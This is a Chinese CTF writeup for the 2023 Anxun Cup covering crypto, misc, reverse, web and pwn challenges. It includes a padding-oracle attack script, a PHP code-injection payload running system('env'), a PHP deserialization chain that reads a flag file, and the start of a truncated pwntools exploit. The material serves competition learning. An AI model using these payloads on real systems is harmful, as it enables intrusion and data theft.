前往小程序,Get更优阅读体验!
立即前往
文档建议反馈控制台
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
发布
首页
学习
活动
专区
工具
TVP最新优惠活动
返回腾讯云官网
社区首页 >专栏 >2023 第六届安洵杯 writeup

2023 第六届安洵杯 writeup

作者头像
用户10781703
发布2023-12-25 09:22:32
6100
发布2023-12-25 09:22:32
举报
文章被收录于专栏:用户10781703的专栏用户10781703的专栏

CRYPTO

010101

漏洞点在

代码语言:javascript
复制
p1[random.choice([i for i, c in enumerate(p1) if c == '1'])] = '0'p2[random.choice([i for i, c in enumerate(p1) if c == '0'])] = '1'

p1只是随机的把1的位置转一个变成0,p2把0的位置随机转一个到1,直接逆回去即可

代码语言:javascript
复制
charon@root:~/Desktop$ nc 124.71.177.14 10001SHA256(XXXX + 46tr7JsAnftJaAj2):bb607c005123726d6b766c22aae953c9b940e577c6eee1834d58d7b4c8aed0bcGive Me XXXX:1sytPress 1 to get ciphertext160193174556824949951075954803233003012816842690127307013510848085346068610971287323876920567332357394122271978453722692457494759798599533250216644767344100147205757319259042511024425933666556684039902639955101810139671259542396251755746455288801028875220258179860863529775701930079256910152846601392232532282209264644554936501718333633068288255331839708706453437022604550696485775468107214433647142338976159359340611823716414851969716109410145514867492749907335929882188585826396855702227989094931315162925698963478866567024466631753790684450624332658872491214428430812988549793793090443138202365654656967830789022109840423787811071805221741453351818771857714177787861825654940160610738012477418672095750642785039751733677142793282708135464838052384986960446905830989908347842119190363468604134025815754338956523711042111079335239435093606014630717749855727048217630149446806934215370001997261252196944147153515660455403386295459397159476008740650783351875870788633500143273859204334981976611258076796194034758380177159012181004978352431457721036954027015879944370720046627251242934827003352629496019813125896143664802547084184729934742025133039198077975240749405903801407144490678961949065090990727629407793704805894056223679969091710110110011110010010110100011101101110001110010111001111110110100101111110011100111010100101111101000010010001000111011000010000100111101000000011011101110011111100101011001010110110000111010111101110101110101001010100101011001110111101111101111000111100100001010111100110011101110011110000101100100011111011100001001001100110001101111101101101101100000101001111011111101001000001111010111100001100010001011101001101011010001110110000100100011100110010100111110101001001110111110110111110000000000011001001101010110000000010010000110100100110010110101000000111110010101001010100011000111000000000010010000101111000011111000010110010111011001000100011001001011000101111010011100101100100100011111011000101010000111011100000001011010010101101101101110101100010000111100111111101010001110100000111100111110000100000101110010111101000000011110111110100001010111011011001000011101100101001011000001100110000000011101110011111101000011001010101000111010010000101010010101101110111111110101000000001011111011111000111001110110101001100001000000010110010001010111000000000001001101000010001011111010010100100101000000000111100111001111011111011111000000001001101101000010011111010001011101010011011100111000001011001001001101001010100000110010100111110010010011110110010110111100001110111010101010101010111001000101110001110111111100110010011101111101101111001000110110010001011110011010000000011111100010110100001110101101010001100101001011010011010001011011101101010111111010000000001000000101100110110100011110001101010110100110111010111110011001001101011100111000010100010001001110000001000111101110010010100000111011010100110101110110100000001100100001101001001100101110100001000011010010110001000110111110000001001010110001100101000001000000010110101000111100100001010000010111011100010111011010010001010011011100001011000101000101010110100100001001110000001001011000011101100100011011011100001011100100001100000100111000011000010001000011110011111000011111011000101001110111000000100111101010001010100100000101001010010110110000011010011000100110011363974195772145231697650077310086493709207023212754288977299477356401449767367884685507497439057315476058887282522651685773985772294344536235166524477663292807416570029315733179528577379504421255562298407728156586102101403178589940556788233347922215473108632642413216683654588730090728695353014477095209183054553113134830662110372665928957973715671446333444093092218507215396038787746527875979643339687945569730551806313156568746812468342482486546209624500679305929578612743025424384816593247796697730099729038972386405154049870284202733894691445908782979047583747805480771490450196971406525546547633889579020657723518264942003696915665961917952145217112253633848340252914175173075397993827903442120956864909938018097693848776019514421316178494154048707742544644528988010562573565558284797954675624387786817541580112660601516327573201366674069645447118005820926804579361542035220072853409208648240744370817666664321901270023789263924215039347973482121942421086705477108683641497511641488548191336178503962755347682824818128652286066613903859084167048583875734142764229143321297366252916602852741256994030818854232006056387114490752371418983540535937394700286498254726888830557455770169142748255294430133390313625632387288003135311581

exp

代码语言:javascript
复制
/*
* 提示:该行代码过长,系统自动注释不进行高亮。一键复制会移除系统注释 
* from gmpy2 import *from Crypto.Util.number import *from tqdm import *n=601931745568249499510759548032330030128168426901273070135108480853460686109712873238769205673323573941222719784537226924574947597985995332502166447673441001472057573192590425110244259336665566840399026399551018101396712595423962517557464552888010288752202581798608635297757019300792569101528466013922325322822092646445549365017183336330682882553318397087064534370226045506964857754681072144336471423389761593593406118237164148519697161094101455148674927499073359298821885858263968557022279890949313151629256989634788665670244666317537906844506243326588724912144284308129885497937930904431382023656546569678307890221098404237878110718052217414533518187718577141777878618256549401606107380124774186720957506427850397517336771427932827081354648380523849869604469058309899083478421191903634686041340258157543389565237110421110793352394350936060146307177498557270482176301494468069342153700019972612521969441471535156604554033862954593971594760087406507833518758707886335001432738592043349819766112580767961940347583801771590121810049783524314577210369540270158799443707200466272512429348270033526294960198131258961436648025470841847299347420251330391980779752407494059038014071444906789619490650909907276294077937048058940562236799690917p='10110110011110010010110100011101101110001110010111001111110110100101111110011100111010100101111101000010010001000111011000010000100111101000000011011101110011111100101011001010110110000111010111101110101110101001010100101011001110111101111101111000111100100001010111100110011101110011110000101100100011111011100001001001100110001101111101101101101100000101001111011111101001000001111010111100001100010001011101001101011010001110110000100100011100110010100111110101001001110111110110111110000000000011001001101010110000000010010000110100100110010110101000000111110010101001010100011000111000000000010010000101111000011111000010110010111011001000100011001001011000101111010011100101100100100011111011000101010000111011100000001011010010101101101101110101100010000111100111111101010001110100000111100111110000100000101110010111101000000011110111110100001010111011011001000011101100101001011000001100110000000011101110011111101000011001010101000111010010000101010010101101110111111110101000000001011111011111000111001110110101001100001000000010110010001010111000000000001001101000010001011111010010100100101000000000111100111001111011111011111000000001001101101000010011111010001011101010011011100111000001011001001001101001010100000110010100111110010010011110110010110111100001110111010101010101010111001000101110001110111111100110010011101111101101111001000110110010001011110011010000000011111100010110100001110101101010001100101001011010011010001011011101101010111111010000000001000000101100110110100011110001101010110100110111010111110011001001101011100111000010100010001001110000001000111101110010010100000111011010100110101110110100000001100100001101001001100101110100001000011010010110001000110111110000001001010110001100101000001000000010110101000111100100001010000010111011100010111011010010001010011011100001011000101000101010110100100001001110000001001011000011101100100011011011100001011100100001100000100111000011000010001000011110011111000011111011000101001110111000000100111101010001010100100000101001010010110110000011010011000100110011'c=363974195772145231697650077310086493709207023212754288977299477356401449767367884685507497439057315476058887282522651685773985772294344536235166524477663292807416570029315733179528577379504421255562298407728156586102101403178589940556788233347922215473108632642413216683654588730090728695353014477095209183054553113134830662110372665928957973715671446333444093092218507215396038787746527875979643339687945569730551806313156568746812468342482486546209624500679305929578612743025424384816593247796697730099729038972386405154049870284202733894691445908782979047583747805480771490450196971406525546547633889579020657723518264942003696915665961917952145217112253633848340252914175173075397993827903442120956864909938018097693848776019514421316178494154048707742544644528988010562573565558284797954675624387786817541580112660601516327573201366674069645447118005820926804579361542035220072853409208648240744370817666664321901270023789263924215039347973482121942421086705477108683641497511641488548191336178503962755347682824818128652286066613903859084167048583875734142764229143321297366252916602852741256994030818854232006056387114490752371418983540535937394700286498254726888830557455770169142748255294430133390313625632387288003135311581# p1=p[:1024]# p2=p[1024:]# pp1=[i for i, c in enumerate(p1) if c == '0']# pp2=[i for i, c in enumerate(p1) if c == '1']# print(pp1)# for i in tqdm(pp1):#     p1 = list(p[:1024])#     p1[i]='1'#     for j in pp2:#         p2 = list(p[1024:])#         p2[j]='0'#         ppp=''.join(p1) + ''.join(p2)#         ppp2=int(ppp,2)#         if n%ppp2==0:#             print(ppp2)#             breakp=23035125732261132358670499878109017381474612877560501678840135971884602002596362770042962719837871778607403423140553717636949563024173949672281747566044348211883894971758093237914208347253908009359914127501739323351540268777972140879841918587634194478383649138731012434783470970638093549174619359989933572268463391374193459608549354611510909253795420360095279545780658678412847237770763508515088914878492525553581261678529131687242421476753253431930293211570439334452217877146659650508457581300434519215816445425880176422556848574152119462509229109443358566019337029013527249995191088717060570352636009477629767659827print(isPrime(p))q=n//pe = 0x10001d=invert(e,(p-1)*(q-1))m=pow(c,d,n)print(long_to_bytes(m))
*/
代码语言:javascript
复制
b'D0g3{sYuWzkFk12A1gcWxG9pymFcjJL7CqN4Cq8PAIACObJ}'

POA

cbc padding attack

代码语言:javascript
复制
from pwn import *from hashlib import sha256import stringfrom pwnlib.util.iters import mbruteforceimport binasciir = remote("124.71.177.14",10010)
table = string.ascii_letters+string.digitsdef pow():    r.recvuntil("XXXX + ")    suffix = r.recv(16).decode("utf8")    r.recvuntil(":")    cipher = r.recvline().strip().decode("utf8")    proof = mbruteforce(lambda x: sha256((x + suffix).encode()).hexdigest() ==                        cipher, table, length=4, method='fixed')    r.sendline(proof)
pow()r.sendline('1')r.recvuntil('This is your flag: ')c=r.recvuntil('\n',drop=True)print('c=',c)iv = c[:32]cipher = c[32:]enc=binascii.unhexlify(cipher)iv=binascii.unhexlify(iv)print('enc=',enc)print('iv=',iv)pt = bytearray(b'\x00'*16)for make_pad_len in range(1, 17):    xored_iv = bytearray(16)    for i in range(16):        xored_iv[i] = iv[i] ^ pt[i]    index = 16-make_pad_len    for i in range(0x100):        _iv = bytearray(16)        for j in range(index, 16):            _iv[j] = xored_iv[j] ^ make_pad_len        _iv[index] = i        _iv = bytes(_iv.rjust(16, b'\x00'))+enc        ivv=_iv.hex()        r.sendline('2')        r.recvuntil('Please enter ciphertext:\n')        # print('tt=',len(tt))        print('ivv=',ivv)        r.send(str(ivv))        res=r.recvuntil('\n')        # print('res=',res)        if b'True' in res:            v = i ^ iv[index] ^ make_pad_len            pt[index] = v            print(chr(v), pt.hex(), bytes(pt))            breakr.interactive()
代码语言:javascript
复制
ivv= 10660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 11660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 12660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 13660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 14660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 15660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 16660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 17660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 18660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 19660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdM 4d467b305040643454746b7d04040404 b'MF{0P@d4Ttk}\x04\x04\x04\x04'[*] Switching to interactive mode
代码语言:javascript
复制
D0g3{0P@d4Ttk}

Rabin

第一步爆破x,获得r,从而n1=n//r=p*q

第二步注意到inv_p*p+inv_q*q=n1+1,再加上p*q=n1,可以求得p,q

第三步,爆破e2,根据p,q直接求d,解密第二部分m,验证前10个字符isprintable就可以爆破出,e2 为 5,第二部分40-a9e4-a67a9ba15345}

第三步,根据relation(),以及第一步,判断x比较可能是8,根据e2,爆破e1是2,rabin解密得到第一段D0g3{82309bce-9db6-53

最终flag:D0g3{82309bce-9db6-5340-a9e4-a67a9ba15345}

Python代码如下:​​​​​​​

代码语言:javascript
复制
from Crypto.Util.number import *from gmpy2 import *n = 285333097560579856892735567589027491455281816676548482904879584411084840450605271899236335787378212457644480538489333957199681005051324763317061914445335184643625612096862543286134102802857549376968548460142475231575293784694948584292852369440735047979684088368282494500434727138560870002195137014489167165627331632368455059106946492710112045617183371020744982960108917884038933243553293376828996387182739769132792122496876799056412450480295939241242493468339649702797915685408056205502660879129130498545921410634619659281124474952328520326377732861327885460825785663612083850698299251860568500798463658863076047273218029864658192865375924206328915181982984562250516942987232706349911392265126207255534866190377014380855435918220022982938162059864440683044775523888991188203006479911766073854154460130165113177584072109403534582913430806912608626570189230138578926612739070744683368688850886527094463667668825307246359436635233811527374246463299941661976846168659355118349992007638908363168630724274951inv_p = 15518556384860245743478620429603192585685787953718242976660224479750998999124338822955414145628584896866254074982803409103638138579055846815417400924284717580342975268418607314979326166327341036902072011846895021125831579420772494902187900359222937225476944827334097644914928633555605528401231109679269995086inv_q = 155844952786694191575297403428699000736198123964886234441336879931357938912183547278484904361669861403393518512602888045819050991788625527088116664969187555777028144199786402659623855374576202766323863308930997626431142188895581868394783999218343754370726823809671619460649473747905784816603565738974432428480c1 = 126976144638062411994384099639219893719548652649797747968794241772829388392059131204549804095367482955713969969355185232593725760428681633925245739792469765283064470833596211603668120879365838887254328902988534426769340803326035688970033255868390278666156442829111587282507934612148101514683146219594379325568501808994038719784055659363522080979550015313702694077294838434724135616183144122907039758450363380287762050096893679619122349248941856699588431034712017310975233907480446137538753544059977757157457507646299200188974533402557530497781126307449150221146472482007846609714342333817505591830507656245367858711393207787365997909956902207542164544097922462033634018795680632571241102059887769247904527047628319436872644835675831505379779011242527097220466159871163455244971911311179106589058265977916423231213266773521104981166940713044082334510252946317916149089661406584941263677321406447326099096001132473765127971954144881177204994916711534164440380921197150440049304017047080659500777241740528c2 = 146941331442564610016438819735547244506352704046774905613426284012869732747925710307265626766652735661835157362691409229558530888941189129960135439286471184689177437139594351730287457489682323200067610139473500557213628686488936379775312971741967583943854236936993185362784886957646210710012024839783323641398605391643544058597455541620941929330435766958836695050614733661967896963275403693970761214082313515330149780215334487889969179336091893274890943467738514867511025492419144817240630139160081094440537994689088123579690334770462633832325163789325881676740410159219779623129230840988303480150753783702883385763373756192046417120986761450383952686760580908911815204339547584815987309530429459803006137138710075476256076429790734381285100612579775390606666816783573924249773339782127155714010817196675330870127749087069339556243710348583718134476356016094530370196897414589976876765847625687561629780514239120563907981343926849715187507551839537984064153228278609868504300922982445067467503667611505

r=10407932194664399081925240327364085538615262247266704805319112350403608059673360298012239441732324184842421613954281007791383566248323464908139906605677320762924129509389220345773183349661583550472959420547689811211693677147548478866962501384438260291732348885311160828538416585028255604666224831890918801847068222203140521026698435488732958028878050869736186900714720710555703168729087p=172734683184670521870728305371917464596062609133662457971030651681563614292692150176606848807534588267834112546004233695199322884456898046304537198440536833886920821550944800659049952451650465399792357613884244821145480278404875760748959392209037101099598435512738382399052937036823852468261051762813693137499q=158711409682623467193918200983728047440421670534311259267841341750844583719487872424882600690624065414558783083519077629543263229349472283576912545178060245058165997332172994084313993698397899585980714769786106061192880855558784452710588701697475203159038487141201679925814406643761912866831915524057271725627assert inv_p==invert(p,q)assert inv_q==invert(q,p)assert n==p*q*rn1=n//r#2 · 3^2 · 71phi=(p-1)*(q-1)def test(m):    for i in m:        if i<30 or i>128:            return 0    return 1print(phi)def relation(e1,e2):    a, b = 0, 0    for i in range(8 - (2**2 - 1)):        a += pow(e1, i)    for j in range(3):        b += pow(e2, j)    if a == b:        return True    return Falsee1=2e2=5mp = pow(c1, (p + 1) // 4, p)mq = pow(c1, (q + 1) // 4, q)a = (inv_p * p * mq + inv_q * q * mp) % n1b = n1 - int(a)c = (inv_p * p * mq - inv_q * q * mp) % n1d = n1- int(c)for i in (a, b, c, d):    print(long_to_bytes(i))exit()
exit()for i in range(1,600):    if(relation(i,e2)):        print(i)exit()#D0g3{82309bce-9db6-5340-a9e4-a67a9ba15345}from tqdm import tqdmfor i in tqdm(range(4,6)):    if gcd(i,phi)>1:        continue    d=invert(i,phi)    m=pow(c2,d,n1)    m=long_to_bytes(m)    if b"}" in m[:30] and test(m[:10])==1:        print(i,m)exit()for x in range(2,100):    r = 2    print("begin",x)    while True:        r = r * x        if r.bit_length() > 1024 and isPrime(r - 1):            r = r - 1            break    if n%r==0:        print(x,r)

MISC

dacongのWindows

桌面flag3一串PBE

图片
图片

根据描述提示注册表,windows.registry.printkey拿到一串字符d@@Coong_LiiKEE_F0r3NsIc

图片
图片

aes解出flag3

图片
图片

document下secret.rar

图片
图片

rstudio恢复出来解压有点问题,用vol3

图片
图片

一堆空白

图片
图片

很明显的snow了

图片
图片

拿到flag2

图片
图片

提示music

图片
图片

dacong_like_listen下面一堆wav,听上去就很像sstv,一个一个试过去

39.wav拿到flag1

图片
图片

拼接flag

代码语言:javascript
复制
flag{Ar3_Th3Y_tHE_DddddAc0Ng_SIst3Rs????}

签到处

代码语言:javascript
复制
D0g3{We1come_TO_AXB_F1111@g}

Nahida

reverse jpg

图片
图片

文件尾

图片
图片

反复提到眼睛,猜测silenteye。那个你一直在寻找的答案,早已出现在你的旅途,fuzz后指的是密码是题目名

图片
图片

dacongのsecret

png fft拿到第一个密码

图片
图片

同样套路,jpg文件尾reverse 压缩包

图片
图片

又要密码

回去看png,很明显19 chunk块长度小于0x10000,那么20 chunk块肯定是多余的(经测试删除后png不会少任何像素)

图片
图片

将19chunk块拿出来,补个png文件头(直接用题目png的文件头)

图片
图片

爆破一下宽高,860*123拿到key

图片
图片

解压后,一眼base64隐写

图片
图片
图片
图片

拿到pass,fuzz后是上一个jpg的jphs,拿到flag

图片
图片
图片
图片

疯狂的麦克斯

1.将docx文件转换为zip提取隐藏文件

图片
图片

2.将麦克斯的称号打开后解密零宽字符得到麦克斯的称号

图片
图片

3.将隐藏的txt文件打开后发现为一个列表,列表的末尾有一串密文

图片
图片

使用rot13并将amount设置为22后密文解密后得到THIS IS MKS DO YOU KNOW WHOAMI

图片
图片

4.将列表也进行同样的解密,根据题目描述,只要将列表每一个值进行base64加密后,就可以在其中找到正确的压缩包密码

图片
图片

脚本如下

​​​​​​​import base64 lst = ['71132E', '328051N', '248199O'...] # 加密函数def encrypt_string(string):    encoded_bytes = base64.b64encode(string.encode('utf-8'))    return encoded_bytes.decode('utf-8') # 打开文件with open('output.txt', 'w') as file:    # 遍历列表中的每一个值    for value in lst:        # 加密并写入文件        encrypted_value = encrypt_string(value)        file.write(encrypted_value + '\n')

爆破

图片
图片

解压压缩包得到flag

图片
图片

REVERSE

MobileGo

libgojni.so的mobile_go_Checkflag函数完成加密,首先初始化随机数生成器,种子为2023

图片
图片

之后随机生成两个随机数并将其作为索引完成flag中字符位置的互换

图片
图片

解密脚本如下,首先通过Go语言生成伪随机数

  • package main import ( "fmt" "math/rand")func main() { source := rand.NewSource(2023) random := rand.New(source) for i := 0; i < 0x26; i++ { randomNumber := random.Intn(0x26) randomNumber1 := random.Intn(0x26) fmt.Print("[", randomNumber, ",", randomNumber1, "]") fmt.Print(",") }}

然后从后往前还原,密文从Android的资源文件中提取

​​​​​​​flag=bytearray(b"49021}5f919038b440139g74b7Dc88330e5d{6")key=[[11,14],[15,37],[24,18],[8,30],[6,9],[30,3],[29,9],[4,13],[13,24],[37,1],[28,28],[3,1],[23,22],[21,26],[7,19],[1,34],[37,17],[27,29],[31,30],[14,2],[35,34],[4,27],[9,3],[3,24],[30,29],[3,27],[14,25],[26,0],[4,28],[5,15],[9,9],[13,18],[24,3],[35,24],[36,27],[25,21],[11,4],[27,28]]for row in reversed(key): tmp=flag[row[0]] flag[row[0]]=flag[row[1]] flag[row[1]]=tmpprint(flag)

代码语言:javascript
复制
D0g3{4c3b5903d11461f94478b7302980e958}

你见过蓝色的小鲸鱼

通过IDA插件可知`BlowFish`加密算法,用户名作为密钥,提取密文后编写脚本解密

图片
图片
代码语言:javascript
复制
from Crypto.Cipher import Blowfishkey=b'UzBtZTBuZV9EMGcz'bf=Blowfish.new(key,Blowfish.MODE_ECB)enc=b"\x11\xA5\x1F\x04\x95\x50\xE2\x50\x8F\x17\xE1\x6C\xF1\x63\x2B\x47"print(bf.decrypt(enc))#QHRoZWJsdWVmMXNo

牢大想你了

反编译Assembly-CSharp.dll文件

其中GameManager.OnValueChanged对输入完成TEA加密

图片
图片

解密脚本如下

代码语言:javascript
复制
#include<string.h>#include <stdio.h>
int main(){  unsigned int Data[12] = { 3363017039U,      1247970816U,      549943836U,      445086378U,      3606751618U,      1624361316U,      3112717362U,      705210466U,      3343515702U,      2402214294U,      4010321577U,      2743404694U };  unsigned int key[4] = { 286331153,      286331153,      286331153,      286331153 };  unsigned int tmp[2] = { 0 };  unsigned int sum = 0;  unsigned int delta = 0x9e3779b9;  for (int i = 0; i < 12; i += 2)  {    tmp[0] = Data[i];    tmp[1] = Data[i + 1];    sum = delta * 32;    for (int j = 0; j < 32; ++j)    {      tmp[1] -= ((tmp[0] << 4) + key[2]) ^ (tmp[0] + sum) ^ ((tmp[0] >> 5) + key[3]);      tmp[0] -= ((tmp[1] << 4) + key[0]) ^ (tmp[1] + sum) ^ ((tmp[1] >> 5) + key[1]);      sum -= delta;    }    Data[i] = tmp[0];    Data[i + 1] = tmp[1];    printf("%c%c%c%c%c%c%c%c", ((char*)&Data[i])[0], ((char*)&Data[i])[1], ((char*)&Data[i])[2], ((char*)&Data[i])[3], ((char*)&Data[i + 1])[0], ((char*)&Data[i + 1])[1], ((char*)&Data[i + 1])[2], ((char*)&Data[i + 1])[3]);  }
  return 0;}

结果为 it_is_been_a_long_day_without_you_my_friend

你好,PE

找到关键代码,有点像CRC64

搜了个脚本一把梭

代码语言:javascript
复制
import struct
def decode_k(v):    is_negative = v & 1    if is_negative:        v ^= 0x54AA4A9    v >>= 1    if is_negative:        v |= 0x8000000000000000    return v
g_key = '4DB87629F5A99E595556B1C42F212C30B3797817A8EDF7DBE153F0DBE903515E09C100DFF096FCC1B5E6629501000000'g_key = bytearray.fromhex(g_key)single_len = 8g_output = [g_key[x:x+single_len] for x in range(0, 6*single_len, single_len)]g_output = [struct.unpack('<Q', x)[0] for x in g_output]
def decode_j(v):    for k in range(64):        v = decode_k(v)    return v
r = [decode_j(x) for x in g_output]flag = [struct.pack('<Q', x) for x in r]flag = [x.decode() for x in flag]print(''.join(flag))#D0g3{60E1E72A-576A8BF0-7701CBB9-B02415EC}

感觉有点点简单

主函数获取数据后进行魔改rc4和魔改base64加密

rc4魔改了sbox的大小和最后异或结果

base64魔改了表和位运算的操作

图片
图片

解密脚本

代码语言:javascript
复制
#include<stdio.h>#include<stdlib.h>#include<string.h>#define sboxSize 64
unsigned char findPos(const unsigned char* base64_map, unsigned char c)//查找下标所在位置{  for (int i = 0; i < strlen((const char*)base64_map); i++)  {    if (base64_map[i] == c)      return i;  }}unsigned char* base64_decode(const unsigned char* code0){  unsigned char* code = (unsigned char*)code0;  unsigned char base64_map[65] = "4KBbSzwWClkZ2gsr1qA+Qu0FtxOm6/iVcJHPY9GNp7EaRoDf8UvIjnL5MydTX3eh";  long len, str_len, flag = 0;  unsigned char* res;  len = strlen((const char*)code);  if (code[len - 1] == '=')  {    if (code[len - 2] == '=')    {      flag = 1;      str_len = len / 4 * 3 - 2;    }
    else    {      flag = 2;      str_len = len / 4 * 3 - 1;    }
  }  else    str_len = len / 4 * 3;  res = (unsigned char*)malloc(sizeof(unsigned char) * str_len + 1);  unsigned char a[4] = { 0 };
  for (int i = 0, j = 0; j < str_len - flag; j += 3, i += 4)  {    a[0] = findPos(base64_map, code[i]);    //code[]每一个字符对应base64表中的位置,用位置值反推原始数据值    a[1] = findPos(base64_map, code[i + 1]);    a[2] = findPos(base64_map, code[i + 2]);    a[3] = findPos(base64_map, code[i + 3]);    res[j] = a[0] | ((a[1] & 0x3) << 6);//第一个字符对应    res[j + 1] = ((a[1] & 0x3c) >> 2) | ((a[2] & 0xf) << 4);    res[j + 2] = ((a[3] & 0x3f) << 2) | ((a[2] & 0x30) >> 4);    //res[j] = a[0] << 2 | a[1] >> 4;    //取出第一个字符对应base64表的十进制数的前6位与第二个字符对应base64表的十进制数的后2位进行组合      //res[j + 1] = a[1] << 4 | a[2] >> 2;  //取出第二个字符对应base64表的十进制数的后4位与第三个字符对应bas464表的十进制数的后4位进行组合      //res[j + 2] = a[2] << 6 | a[3];     //取出第三个字符对应base64表的十进制数的后2位与第4个字符进行组合   }
  switch (flag)  {  case 0:break;  case 1:  {    a[0] = findPos(base64_map, code[len - 4]);    a[1] = findPos(base64_map, code[len - 3]);    res[str_len - 1] = a[0] | ((a[1] & 0x3) << 6);    break;  }  case 2: {    a[0] = findPos(base64_map, code[len - 4]);    a[1] = findPos(base64_map, code[len - 3]);    a[2] = findPos(base64_map, code[len - 2]);    res[str_len - 2] = a[0] | ((a[1] & 0x3) << 6);//第一个字符对应    res[str_len - 1] = ((a[1] & 0x3c) >> 2) | ((a[2] & 0xf) << 4);    //res[str_len - 2] = a[0] << 2 | a[1] >> 4;    //res[str_len - 1] = a[1] << 4 | a[2] >> 2;    break;  }  }  res[str_len] = '\0';  return res;}
unsigned char sbox[sboxSize] = { 0 };void swap(unsigned char* a, unsigned char* b){  unsigned char tmp = *a;  *a = *b;  *b = tmp;}void init_sbox(unsigned char key[], int keyLen) {  for (unsigned int i = 0; i < sboxSize; i++)//赋值    sbox[i] = i;  unsigned char Ttable[sboxSize] = { 0 };  for (int i = 0; i < sboxSize; i++)    Ttable[i] = key[i % keyLen];//根据初始化t表  for (int j = 0, i = 0; i < sboxSize; i++)  {    j = (j + sbox[i] + Ttable[i]) % sboxSize;  //打乱s盒    swap(&sbox[i], &sbox[j]);  }}void RC4_enc_dec(unsigned char data[], int dataLen, unsigned char key[], int keyLen) {  unsigned char i = 0, j = 0;  init_sbox(key, keyLen);  for (unsigned int h = 0; h < dataLen; h++)  {    i = (i + 1) % sboxSize;    j = (j + sbox[i]) % sboxSize;    swap(&sbox[i], &sbox[j]);    data[h] ^= (i^j)&sbox[(((i^j)+sbox[i]+sbox[j])%sboxSize)];  }}
int main() {  unsigned char BaseData[] = "6zviISn2McHsa4b108v29tbKMtQQXQHA+2+sTYLlg9v2Q2Pq8SP24Uw=";  unsigned char* result=base64_decode(BaseData);//魔改base  RC4_enc_dec(result, 41,(unsigned char*)"the_key_", 8);//魔改rc4
  printf("%s", result);  return 0;}

WEB

what’s my name

图片
图片
代码语言:javascript
复制
?d0g3=’”]);}system(‘env’);;;;/*include&name=%00lambda_32

跑32次

easy_unserialize​​​​​​​

代码语言:javascript
复制
<?phpclass Good{    public $g1;    private $gg2='*&'; }class Luck{    public $l1;    public $ll2;    private $md5=1131911;    public $lll3;}class To{    public $t1;    public $tt2;    public $arg1 = array("guangji"=>1);     }class You{    public $y1;     }class Flag{ }$F = new Flag;$F->SplFileObject = "/FfffLlllLaAaaggGgGg";$F->b = "";$l2 = new Luck;$l2->l1 = $F;$t2 = new To;$t2->t1 = $l2;$l = new Luck;$l->ll2 = $t2;$t = new To;$t->tt2 = $l;$g = new Good;$g->g1 = $t;$r = new Luck;$r->lll3 = $g;$q = new You;$q->y1 = $r;echo urlencode(serialize($q));

payload

代码语言:javascript
复制
D0g3=O%3A3%3A%22You%22%3A1%3A%7Bs%3A2%3A%22y1%22%3BO%3A4%3A%22Luck%22%3A4%3A%7Bs%3A2%3A%22l1%22%3BN%3Bs%3A3%3A%22ll2%22%3BN%3Bs%3A9%3A%22%00Luck%00md5%22%3Bi%3A1131911%3Bs%3A4%3A%22lll3%22%3BO%3A4%3A%22Good%22%3A2%3A%7Bs%3A2%3A%22g1%22%3BO%3A2%3A%22To%22%3A3%3A%7Bs%3A2%3A%22t1%22%3BN%3Bs%3A3%3A%22tt2%22%3BO%3A4%3A%22Luck%22%3A4%3A%7Bs%3A2%3A%22l1%22%3BN%3Bs%3A3%3A%22ll2%22%3BO%3A2%3A%22To%22%3A3%3A%7Bs%3A2%3A%22t1%22%3BO%3A4%3A%22Luck%22%3A4%3A%7Bs%3A2%3A%22l1%22%3BO%3A4%3A%22Flag%22%3A2%3A%7Bs%3A13%3A%22SplFileObject%22%3Bs%3A20%3A%22%2FFfffLlllLaAaaggGgGg%22%3Bs%3A1%3A%22b%22%3Bs%3A0%3A%22%22%3B%7Ds%3A3%3A%22ll2%22%3BN%3Bs%3A9%3A%22%00Luck%00md5%22%3Bi%3A1131911%3Bs%3A4%3A%22lll3%22%3BN%3B%7Ds%3A3%3A%22tt2%22%3BN%3Bs%3A4%3A%22arg1%22%3Ba%3A1%3A%7Bs%3A7%3A%22guangji%22%3Bi%3A1%3B%7D%7Ds%3A9%3A%22%00Luck%00md5%22%3Bi%3A1131911%3Bs%3A4%3A%22lll3%22%3BN%3B%7Ds%3A4%3A%22arg1%22%3Ba%3A1%3A%7Bs%3A7%3A%22guangji%22%3Bi%3A1%3B%7D%7Ds%3A9%3A%22%00Good%00gg2%22%3Bs%3A2%3A%22%2A%26%22%3B%7D%7D%7D

PWN

seccomp

图片
图片

一个输入长gadget的全局变量,一次溢出机会

图片
图片

有沙箱,但是可以orw读出flag,借助一部分srop的手法加以利用​​​​​​​

代码语言:javascript
复制
from pwn import *import timeimport subprocesscontext(arch='amd64',os='linux',log_level='debug')command = "ls -l"#p = process('./chall')p=remote("47.108.206.43",22039)elf = ELF("./chall")
#libc = ELF("./libc-2.23.so")#libc = ELF("./libc.so.6")#context(arch="amd64",os="linux",log_level="debug")def s(a) : p.send(a)def sa(a, b) : p.sendafter(a, b)def sl(a) : p.sendline(a)def sla(a, b) : p.sendlineafter(a, b)def r() : return p.recv()def pr() : print(p.recv())def rl(a) : return p.recvuntil(a)def inter() : p.interactive()def get_addr():  return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
#752leave = 0x40136csig = 0x0000000000401194sy = 0x000000000040118a#gdb.attach(p)
